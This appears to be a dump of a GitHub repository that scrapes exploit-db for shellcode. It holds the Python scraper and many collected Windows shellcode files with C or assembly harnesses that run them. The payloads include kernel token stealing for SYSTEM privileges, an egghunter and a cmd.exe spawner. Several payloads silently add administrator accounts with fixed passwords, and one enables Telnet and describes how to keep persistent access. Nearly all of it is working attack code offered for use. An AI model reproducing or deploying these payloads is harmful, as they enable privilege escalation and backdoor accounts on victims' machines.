https://raw.githubusercontent.com/WangYihang/ShellcodeSpider/55cf38010b85151ddb4ad10edd2f278ec737ec33/README.md -------------------------------------------------------------------------------- /Spider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding:utf-8 3 | 4 | import requests 5 | import bs4 6 | import time 7 | import sys 8 | import os 9 | 10 | from getItem import run 11 | 12 | def getAllPages(soup): 13 | result = [] 14 | table = soup.find("table", class_="exploit_list bootstrap-wrapper") 15 | tbody = table.find("tbody") 16 | trs = tbody.find_all("tr") 17 | for tr in trs: 18 | temp = tr.find("td", class_="description") 19 | link = temp.find("a")["href"] 20 | result.append(link) 21 | return result 22 | 23 | headers = { 24 | "Host" : "www.exploit-db.com", 25 | "User-Agent" : "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0", 26 | "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 
27 | "Accept-Language" : "en-US,en;q=0.5", 28 | "Accept-Encoding" : "gzip, deflate, br", 29 | "Connection" : "keep-alive", 30 | "Upgrade-Insecure-Requests" : "1", 31 | "Pragma" : "no-cache", 32 | "Cache-Control" : "no-cache" 33 | } 34 | 35 | shellcode_types = [ 36 | "Linux", 37 | "Lin_x86", 38 | "Lin_x86-64", 39 | "Windows", 40 | "Win_x86", 41 | "Win_x86-64", 42 | "Multiple", 43 | "Generator" 44 | ] 45 | 46 | command = "git init" 47 | os.system(command) 48 | 49 | for shellcode_type in shellcode_types: 50 | try: 51 | os.makedirs(shellcode_type) 52 | except Exception as e: 53 | print e 54 | url = "https://www.exploit-db.com/shellcode/?order_by=title&order=asc&p=" + shellcode_type 55 | response = requests.get(url, headers=headers) 56 | content = response.text.encode("UTF-8") 57 | soup = bs4.BeautifulSoup(content, "html.parser") 58 | 59 | links = getAllPages(soup) 60 | for link in links: 61 | print "==============================" 62 | print "Handling : " + link 63 | # command = "python ./getItem.py " + link + " " + shellcode_type 64 | run(link, shellcode_type) 65 | # os.system(command) 66 | 67 | -------------------------------------------------------------------------------- /Win_x86-64/Windows_10_x64_-_Egghunter_Shellcode__45_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | PUBLIC Win10egghunterx64 2 | 3 | .code 4 | 5 | Win10egghunterx64 PROC 6 | 7 | _start: 8 | push 7fh 9 | pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls 10 | 11 | _setup: 12 | inc rdi ; parameter 1 - lpAddress - counter 13 | mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE 14 | pop rsi ; Stack alignment before the stack setup 15 | pop rsi 16 | push rdi 17 | push rsp 18 | pop rdx ; pointer to lpAddress 19 | push 08h ; parameter 2 - dwSize 0x8 20 | push rsp 21 | pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp 22 | mov [rdx+20h],rsp ; 
parameter 4 - lpflOldprotect 23 | dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error 24 | _VirtualProtectEx: 25 | 26 | push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family 27 | pop rax 28 | syscall 29 | 30 | _rc_check: 31 | 32 | cmp al,01h ; check the response for non-allocated memory 33 | jge _setup 34 | 35 | _end: ; There won't be too many of these eggs in the memory 36 | 37 | mov eax, 042303042h ; the egg 38 | scasd 39 | jnz _setup 40 | jmp rdi 41 | 42 | Win10egghunterx64 ENDP 43 | END -------------------------------------------------------------------------------- /Win_x86-64/Windows_2003_x64_-_Token_Stealing_Shellcode__59_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;token stealing shellcode Win 2003 x64 2 | ;based on the widely available x86 version 3 | ;syntax for NASM 4 | ;Author: Csaba Fitzl, @theevilbit 5 | 6 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 7 | ;important structures and offsets; 8 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 9 | 10 | ;kd> dt -r1 nt!_TEB 11 | ; +0x110 SystemReserved1 : [54] Ptr64 Void 12 | ;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly 13 | 14 | ;kd> dt -r1 nt!_KTHREAD 15 | ; +0x048 ApcState : _KAPC_STATE 16 | ; +0x000 ApcListHead : [2] _LIST_ENTRY 17 | ; +0x020 Process : Ptr64 _KPROCESS 18 | 19 | ;kd> dt -r1 nt!_EPROCESS 20 | ; +0x0d8 UniqueProcessId : Ptr64 Void 21 | ; +0x0e0 ActiveProcessLinks : _LIST_ENTRY 22 | ; +0x000 Flink : Ptr64 _LIST_ENTRY 23 | ; +0x008 Blink : Ptr64 _LIST_ENTRY 24 | ; +0x160 Token : _EX_FAST_REF 25 | ; +0x000 Object : Ptr64 Void 26 | ; +0x000 RefCnt : Pos 0, 4 Bits 27 | ; +0x000 Value : Uint8B 28 | 29 | BITS 64 30 | 31 | global start 32 | 33 | section .text 34 | 35 | start: 36 | mov rax, [gs:0x188] ;Get current ETHREAD in 37 | mov rax, [rax+0x68] ;Get current EPROCESS address 38 | mov rcx, rax ;Copy 
current EPROCESS address to RCX 39 | 40 | find_system_process: 41 | mov rax, [rax+0xe0] ;Next EPROCESS ActiveProcessLinks.Flink 42 | sub rax, 0xe0 ;Go to the beginning of the EPROCESS structure 43 | mov r9 , [rax+0xd8] ;Copy PID to R9 44 | cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4) 45 | jnz short find_system_process ;If not SYSTEM got to next EPROCESS 46 | 47 | stealing: 48 | mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX 49 | mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address 50 | retn 0x10 51 | 52 | ;byte stream: 53 | ;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1" 54 | ;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88" 55 | ;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00" 56 | ;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00" -------------------------------------------------------------------------------- /Win_x86-64/Windows_7_Professional_SP1_x64__FR__-_Beep_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | char shellcode[] = 4 | 5 | "\x31\xC9" //xor ecx, ecx 6 | "\x64\x8B\x71\x30" //mov esi, [fs:ecx+0x30] 7 | "\x8B\x76\x0C" //mov esi, [esi+0x0C] 8 | "\x8B\x76\x1C" //mov esi, [esi+0x1c] 9 | "\x8B\x06" //mov eax, [esi] 10 | "\x8B\x68\x08" //mov ebp, [eax+0x08] 11 | "\x68\x11\x11\x11\x11" //push 0x11111111 12 | "\x66\x68\x11\x11" //push word 0x1111 13 | "\x5B" //pop ebx 14 | "\x53" //push ebx 15 | "\x55" //push ebp 16 | "\x5B" //pop ebx 17 | "\x66\x81\xC3\x4B\x85" //add bx, 0x854b 18 | "\xFF\xD3" //call ebx 19 | "\xEB\xEA"; //jmp short 20 | 21 | 22 | int main(int argc, char **argv) { 23 | int *ret; 24 | ret = (int *)&ret + 2; 25 | (*ret) = (int) shellcode; 26 | } -------------------------------------------------------------------------------- 
/Win_x86-64/Windows_7_x64_-_cmd_Shellcode__61_bytes___Shellcode_exploit_for_Win_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | | Title: Windows Seven x64 (cmd) Shellcode 61 Bytes 3 | | Type: Shellcode 4 | | Author: agix 5 | | Platform: win32 6 | | Info: Tested on Windows Seven Pro Fr, Ultimate En, Premium Home En 7 | */ 8 | 9 | 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 10 | 0 _ __ __ __ 1 11 | 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 12 | 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 13 | 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 14 | 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 15 | 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 16 | 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 17 | 1 \ \____/ >> Exploit database separated by exploit 0 18 | 0 \/___/ type (local, remote, DoS, etc.) 1 19 | 1 1 20 | 0 [+] Site : Inj3ct0r.com 0 21 | 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 22 | 0 0 23 | 1 ################################## 1 24 | 0 I'm agix member from Inj3ct0r Team 1 25 | 1 ################################## 0 26 | 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 27 | 28 | #include 29 | 30 | char shellcode[] = 31 | 32 | "\x31\xC9" //xor ecx,ecx 33 | "\x64\x8B\x71\x30" //mov esi,[fs:ecx+0x30] 34 | "\x8B\x76\x0C" //mov esi,[esi+0xc] 35 | "\x8B\x76\x1C" //mov esi,[esi+0x1c] 36 | "\x8B\x36" //mov esi,[esi] 37 | "\x8B\x06" //mov eax,[esi] 38 | "\x8B\x68\x08" //mov ebp,[eax+0x8] 39 | "\xEB\x20" //jmp short 0x35 40 | "\x5B" //pop ebx 41 | "\x53" //push ebx 42 | "\x55" //push ebp 43 | "\x5B" //pop ebx 44 | "\x81\xEB\x11\x11\x11\x11" //sub ebx,0x11111111 45 | "\x81\xC3\xDA\x3F\x1A\x11" //add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6) 46 | "\xFF\xD3" //call ebx 47 | "\x81\xC3\x11\x11\x11\x11" //add ebx,0x11111111 48 | "\x81\xEB\x8C\xCC\x18\x11" //sub ebx,0x1118cc8c (for seven X86 sub 
ebx,0x1114ccd7) 49 | "\xFF\xD3" //call ebx 50 | "\xE8\xDB\xFF\xFF\xFF" //call dword 0x15 51 | //db "cmd" 52 | "\x63\x6d\x64"; 53 | 54 | 55 | int main(int argc, char **argv) { 56 | int *ret; 57 | ret = (int *)&ret + 2; 58 | (*ret) = (int) shellcode; 59 | } -------------------------------------------------------------------------------- /Win_x86/Windows_5_0___7_0_x86_-_Speaking__You_got_pwned!__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | A null-free shellcode for 32-bit versions of Windows 5.0-7.0 all service packs that uses Microsoft Speech API to say "You got pwned!" over the speakers. Includes optional code that fixes stack alignment (adds 5 bytes) and bypasses EAF (adds 29 bytes). 2 | 3 | Features: 4 | 5 | NULL Free 6 | Windows version and service pack independent. 7 | No assumptions are made about the values of registers. 8 | "/3GB" compatible: pointers are not assumed to be smaller than 0x80000000. 9 | DEP/ASLR compatible: data is not executed, code is not modified. 10 | Windows 7 compatible: kernel32 is found based on the length of its name. 11 | 12 | Download: 13 | https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15879.zip (w32-speaking-shellcode.zip) -------------------------------------------------------------------------------- /Win_x86/Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__29_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | // 2 | // PEB way of getting kernel32 imagebase by loco. 3 | // Compatible with all Win9x/NT based operating systems. 4 | // 5 | // Gives kernel32 imagebase in eax when executing. 6 | // 29 bytes, only eax/esi used. 7 | // 8 | // Originally discovered by Dino Dai Zovi. 
9 | // 10 | // 11 | 12 | #include 13 | 14 | /* 15 | xor eax, eax 16 | add eax, fs:[eax+30h] 17 | js method_9x 18 | 19 | method_nt: 20 | mov eax, [eax + 0ch] 21 | mov esi, [eax + 1ch] 22 | lodsd 23 | mov eax, [eax + 08h] 24 | jmp kernel32_ptr_found 25 | 26 | method_9x: 27 | mov eax, [eax + 34h] 28 | lea eax, [eax + 7ch] 29 | mov eax, [eax + 3ch] 30 | kernel32_ptr_found: 31 | */ 32 | 33 | unsigned char Shellcode[] = 34 | "\x33\xC0" // xor eax, eax 35 | "\x64\x03\x40\x30" // add eax, dword ptr fs:[eax+30] 36 | "\x78\x0C" // js short $+12 37 | "\x8B\x40\x0C" // mov eax, dword ptr [eax+0C] 38 | "\x8B\x70\x1C" // mov esi, dword ptr [eax+1C] 39 | "\xAD" // lodsd 40 | "\x8B\x40\x08" // mov eax, dword ptr [eax+08] 41 | "\xEB\x09" // jmp short $+9 42 | "\x8B\x40\x34" // mov eax, dword ptr [eax+34] 43 | "\x8D\x40\x7C" // lea eax, dword ptr [eax+7C] 44 | "\x8B\x40\x3C" // mov eax, dword ptr [eax+3C] 45 | ; // = 29 bytes. 46 | 47 | int main() 48 | { 49 | printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1); 50 | return 1; 51 | } 52 | 53 | // milw0rm.com [2005-07-26] -------------------------------------------------------------------------------- /Win_x86/Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__31_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 004045F4 > 6A 30 PUSH 30 3 | 004045F6 59 POP ECX 4 | 004045F7 64:8B09 MOV ECX,DWORD PTR FS:[ECX] 5 | 004045FA 85C9 TEST ECX,ECX 6 | 004045FC 78 0C JS SHORT OllyTest.0040460A 7 | 004045FE 8B49 0C MOV ECX,DWORD PTR DS:[ECX+C] 8 | 00404601 8B71 1C MOV ESI,DWORD PTR DS:[ECX+1C] 9 | 00404604 AD LODS DWORD PTR DS:[ESI] 10 | 00404605 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 11 | 00404608 EB 09 JMP SHORT OllyTest.00404613 12 | 0040460A 8B49 34 MOV ECX,DWORD PTR DS:[ECX+34] 13 | 0040460D 8B49 7C MOV ECX,DWORD PTR DS:[ECX+7C] 14 | 00404610 8B49 3C MOV ECX,DWORD PTR DS:[ECX+3C] 15 | */ 16 | 17 | /* 18 | 31 byte C PEB kernel base location 
method works on win9x-win2k3 19 | no null bytes, so no need to xor. 20 | 21 | -twoci 22 | */ 23 | 24 | unsigned char PEBCode[] = 25 | {"\x6A\x30" 26 | "\x59" 27 | "\x64\x8B\x09" 28 | "\x85\xC9" 29 | "\x78\x0C" 30 | "\x8B\x49\x0C" 31 | "\x8B\x71\x1C" 32 | "\xAD" 33 | "\x8B\x48\x08" 34 | "\xEB\x09" 35 | "\x8B\x49\x34" 36 | "\x8B\x49\x7C" 37 | "\x8B\x49\x3C"}; 38 | 39 | int main( int argc, char *argv[] ) 40 | { 41 | printf( "sizeof(PEBCode) = %u\n", sizeof(PEBCode) ); 42 | return 0; 43 | } 44 | 45 | // milw0rm.com [2005-01-26] -------------------------------------------------------------------------------- /Win_x86/Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*This is a 35 byte C implementation of the use of the PEB method to get 2 | *the kernel32 base address on Windows. This is generic code designed to 3 | *run on both Windows 9x and NT based systems. The code has been optimized 4 | *to not have any 00h bytes so that you wont have to use an XOR routine to 5 | *encode the shellcode. I used relative jumps and xor tricks to avoid the 6 | *00h bytes and make the code as small as I could get it. Feel free to use 7 | *this source in anything that you want. 8 | */ 9 | 10 | 11 | /* 35 byte PEB method for Windows 9x/NT/2k/XP 12 | * 0x00 byte optimized, no XOR routine required. 
13 | * 14 | * www.4x10m.com 15 | * oc.192 16 | * irc.4x10m.net #4x10m 17 | */ 18 | 19 | unsigned char shellcode[] = 20 | /* 35 byte PEB - 00h removal and size optimized */ 21 | /* 22 - 24 total clock cycles on a x486 */ 22 | "\x31\xC0" /* xor eax, eax */ 23 | "\x31\xD2" /* xor edx, edx */ 24 | "\xB2\x30" /* mov dl, 30h */ 25 | "\x64\x8B\x02" /* mov eax, [fs:edx] */ /* PEB base address */ 26 | "\x85\xC0" /* test eax, eax */ 27 | "\x78\xC0" /* js 0Ch */ 28 | "\x8B\x40\x0C" /* mov eax, [eax+0Ch] */ /* NT kernel32 routine */ 29 | "\x8B\x70\x1C" /* mov esi, [eax+1Ch] */ 30 | "\xAD" /* lodsd */ 31 | "\x8B\x40\x08" /* mov eax, [eax+08h] */ 32 | "\xEB\x07" /* jmp short 09h */ 33 | "\x8B\x40\x34" /* mov eax, [eax+34h] */ /* 9x kernel32 routine */ 34 | "\x8D\x40\x7C" /* lea eax, [eax+7Ch] */ 35 | "\x8D\x40\x3C" /* mov eax, [eax+3Ch] */ 36 | ; 37 | 38 | int main(int argc, char *argv[]) { 39 | //void (*sc)() = (void *)shellcode; 40 | printf("len:%d\n", sizeof(shellcode)); 41 | //sc(); 42 | return 0; 43 | } 44 | 45 | // milw0rm.com [2005-01-09] -------------------------------------------------------------------------------- /Win_x86/Windows_NT_2000_XP__Russian__-_Add_Administartor_User__slim_shady__Shellcode__318_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | \ win32 useradd shellcode for russian systems 3 | / by Darkeagle 4 | \ ExploiterZ Lab 5 | / http://exploiterz.org 6 | \ 7 | */ 8 | 9 | // add user "slim" with password "shady" with admin prem. 
in Russian Systems 10 | unsigned char data[318] = { 11 | 0xEB, 0x0F, 0x58, 0x80, 0x30, 0x17, 0x40, 0x81, 0x38, 0x6D, 0x61, 0x7A, 0x61, 0x75, 0xF4, 0xEB, 12 | 0x05, 0xE8, 0xEC, 0xFF, 0xFF, 0xFF, 0xFE, 0xB6, 0x17, 0x17, 0x17, 0x4A, 0x42, 0x26, 0xCC, 0x73, 13 | 0x9C, 0x14, 0x57, 0x84, 0x9C, 0x54, 0xE8, 0x57, 0x62, 0xEE, 0x9C, 0x44, 0x14, 0x71, 0x26, 0xC5, 14 | 0x71, 0xAF, 0x17, 0x07, 0x71, 0x96, 0x2D, 0x5A, 0x4D, 0x63, 0x13, 0x3E, 0xD5, 0xFC, 0xE2, 0x9E, 15 | 0xC4, 0x9C, 0x6D, 0x2B, 0x16, 0xC0, 0x14, 0x48, 0x6F, 0x9C, 0x5C, 0x0F, 0x9C, 0x64, 0x37, 0x9C, 16 | 0x6C, 0x33, 0x16, 0xC1, 0x16, 0xC0, 0xEB, 0xBA, 0x16, 0xC7, 0x81, 0x90, 0xEA, 0x46, 0x26, 0xDE, 17 | 0x97, 0xD6, 0x18, 0xE4, 0xB1, 0x65, 0x1D, 0x81, 0x4E, 0x90, 0xEA, 0x63, 0x18, 0x50, 0x50, 0xF5, 18 | 0xF1, 0xA9, 0x18, 0x17, 0x17, 0x17, 0x3E, 0xD9, 0x3E, 0xE0, 0xFC, 0xFC, 0x26, 0xD7, 0x71, 0x9C, 19 | 0x10, 0xD6, 0xF7, 0x15, 0x9C, 0x64, 0x0B, 0x16, 0xC1, 0x16, 0xD1, 0xBA, 0x16, 0xC7, 0x9E, 0xD1, 20 | 0x9E, 0xC0, 0x4A, 0x9A, 0x92, 0x0B, 0x17, 0x17, 0x17, 0x47, 0x40, 0xE8, 0xC1, 0x7F, 0x12, 0x17, 21 | 0x17, 0x17, 0x9A, 0x9A, 0x27, 0x17, 0x17, 0x17, 0x46, 0xE8, 0xC7, 0x9A, 0x92, 0x33, 0x17, 0x17, 22 | 0x17, 0x47, 0x40, 0xE8, 0xC1, 0x7F, 0x17, 0x17, 0x17, 0x17, 0xE8, 0xC7, 0xFF, 0x4D, 0xE8, 0xE8, 23 | 0xE8, 0x50, 0x72, 0x63, 0x47, 0x65, 0x78, 0x74, 0x56, 0x73, 0x73, 0x65, 0x72, 0x64, 0x64, 0x17, 24 | 0x5B, 0x78, 0x76, 0x73, 0x5B, 0x7E, 0x75, 0x65, 0x76, 0x65, 0x6E, 0x56, 0x17, 0x40, 0x7E, 0x79, 25 | 0x52, 0x6F, 0x72, 0x74, 0x17, 0x52, 0x6F, 0x7E, 0x63, 0x47, 0x65, 0x78, 0x74, 0x72, 0x64, 0x64, 26 | 0x17, 0x74, 0x7A, 0x73, 0x37, 0x38, 0x74, 0x37, 0x79, 0x72, 0x63, 0x37, 0x62, 0x64, 0x72, 0x65, 27 | 0x37, 0x38, 0x76, 0x73, 0x73, 0x37, 0x64, 0x7B, 0x7E, 0x7A, 0x37, 0x64, 0x7F, 0x76, 0x73, 0x6E, 28 | 0x31, 0x31, 0x79, 0x72, 0x63, 0x37, 0x7B, 0x78, 0x74, 0x76, 0x7B, 0x70, 0x65, 0x78, 0x62, 0x67, 29 | 0x37, 0x38, 0x76, 0x73, 0x73, 0x37, 0xF7, 0xF3, 0xFB, 0xFF, 0xFA, 0xFF, 0xE6, 0xE5, 0xE7, 0xF7, 30 | 0xE5, 0xF9, 0xE7, 0xEC, 
0x37, 0x64, 0x7B, 0x7E, 0x7A, 0x17, 0x6D, 0x61, 0x7A, 0x61 31 | }; 32 | 33 | int main() 34 | { 35 | 36 | void (*c0d3)(); 37 | printf("Win32 \"adduser shellcode\"\n"); 38 | *(int*)&c0d3 = data; 39 | c0d3(); 40 | } 41 | 42 | // milw0rm.com [2005-10-28] -------------------------------------------------------------------------------- /Win_x86/Windows_NT_XP_x86_-_IsDebuggerPresent_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* Shellcode Length: 39 bytes */ 2 | /* sets PEB->BeingDebugged to 0 */ 3 | /* IsDebuggerPresent()/BeingDebugged bypass */ 4 | /* by ex-pb @ screw_you@web.de */ 5 | /* greets: xgx and all i forgot */ 6 | 7 | #include 8 | #include 9 | 10 | char ShellCode[] = "\xEB" 11 | "\x0F\x58\x80\x30\x95\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF" 12 | "\xFF\xF1\x34\xA5\x95\x95\x95\xAB\x53\xD5\x97\x95\x56\x68\x61\x63\x6B\xCD"; 13 | 14 | int main() 15 | { 16 | printf("Shellcode length: %d\n", strlen(ShellCode)); 17 | return 0; 18 | } 19 | 20 | // milw0rm.com [2007-05-31] -------------------------------------------------------------------------------- /Win_x86/Windows_PerfectXp-pc1_SP3_x86__Turkish__-_Add_Administrator_User__kpss_12345__Shellcode__112_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes 2 | # Author : KaHPeSeSe 3 | # Screenshot : http://i53.tinypic.com/289yamq.jpg 4 | # Desc. 
: usr: kpss , pass: 12345 , localgroup: Administrator 5 | # Tested on : PERFECT XP PC1 / SP3 6 | # Date : 18/07/2011 7 | # Not : a.q kpss :(( 8 | 9 | #include 10 | #include 11 | #include 12 | 13 | int main(){ 14 | 15 | unsigned char shellcode[]= 16 | "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c" 17 | "\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff" 18 | "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73" 19 | "\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64" 20 | "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f" 21 | "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73" 22 | "\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73"; 23 | 24 | printf("Size = %d bytes\n", strlen(shellcode)); 25 | 26 | ((void (*)())shellcode)(); 27 | 28 | 29 | 30 | return 0; 31 | } -------------------------------------------------------------------------------- /Win_x86/Windows_SP1_SP2_x86_-_Beep_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode can be changed to work with any windows distribution by changing the address of Beep in kernel32.dll 3 | Addresses for SP1 and SP2 4 | 5 | -xnull 6 | */ 7 | 8 | #include 9 | 10 | unsigned char beepsp1[] = 11 | "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" 12 | "\x10\xC9\xEA\x77" //Address \x10\xC9\xEA\x77 = SP1 13 | "\xC7\x44\x24\x04" 14 | "\xE8\x03" //Length \xE8\x03 = 1000 (1 second) 15 | "\x00\x00\xC7\x04\x24" 16 | "\xE8\x03" //Frequency \xE8\x03 = 1000 17 | "\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3"; 18 | 19 | unsigned char beepsp2[] = 20 | "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" 21 | "\x53\x8A\x83\x7C" //Address \x53\x8A\x83\x7C = SP2 22 | "\xC7\x44\x24\x04" 23 | "\xD0\x03" //Length \xD0\x03 = 2000 (2 seconds) 24 | "\x00\x00\xC7\x04\x24" 25 | "\x01\x0E" //Frequency \x01\x0E = 3585 26 | 
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3"; 27 | 28 | int main() 29 | { 30 | void (*function)(); 31 | *(long*)&function = (long)beepsp1; 32 | function(); 33 | } 34 | 35 | // milw0rm.com [2006-04-14] -------------------------------------------------------------------------------- /Win_x86/Windows_XP_Home_SP2__English__-_calc_exe_Shellcode__37_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Windows Xp Home edition SP2 english ( calc.exe ) 37 bytes shellcode 3 | * by: Hazem mofeed Aka Hakxer 4 | * penetration testing labs 5 | * www.pentestlabs.com 6 | */ 7 | 8 | char evil[] = 9 | "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\xff\xd3\x31\xc0" 10 | "\x50\xbb\xea\xcd\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c" 11 | "\x63\x2e\x65\x78\x65\x00"; 12 | 13 | int main(int argc, char **argv) 14 | { 15 | int (*shellcode)(); 16 | shellcode = (int (*)()) evil; 17 | (int)(*shellcode)(); 18 | } -------------------------------------------------------------------------------- /Win_x86/Windows__Net_Framework_x86_-_Execute_Native_x86_Shellcode__Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Exploit Title: .Net framework execute native x86 shellcode 2 | # Date: May. 
2nd 2016 3 | # Exploit Author: Jacky5112  4 | # Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0 5 | # Version: 1.0 6 | # Tested on: Windows 7 | # CVE : (none) 8 | 9 | https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Add_Administrator_User__GAZZA_123456__+_Start_Telnet_Service_Shellcode__111_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; payload:add admin acount & Telnet Listening 2 | ; Author: DATA_SNIPER 3 | ; size:111 bytes 4 | ; platform:WIN32/XP SP2 FR 5 | ; thanks:Arab4services team & AT4RE Team 6 | ; more info: visit my blog http://datasniper.arab4services.net 7 | ; The Sh3llcode: 8 | ; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63" 9 | ; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35" 10 | ; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67" 11 | ; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73" 12 | ; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61" 13 | ; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00" 14 | ; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x. 
15 | ; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD 16 | ; Start telnet service: sc start TlntSvr 17 | ; For saving ur access to the B0x again and again :),u can use this command: 18 | ; "sc config TlntSvr start= auto & sc start TlntSvr" instead of: 19 | ; "sc start TlntSvr" 20 | ; NASM -s -fbin telnetbind.asm 21 | BITS 32 22 | db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem. 23 | Exec: 24 | MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR 25 | CALL EDX 26 | INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop 27 | Data: 28 | CALL Exec 29 | db 'cmd /c net user GAZZA 123456 /ADD & net localgroup Administrateurs GAZZA /ADD & sc start TlntSvr',00h 30 | ;add user GAZA with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;) 31 | 32 | ; milw0rm.com [2009-02-27] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Add_Local_Administrator_User__secuid0_m0nk__Shellcode__326_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: 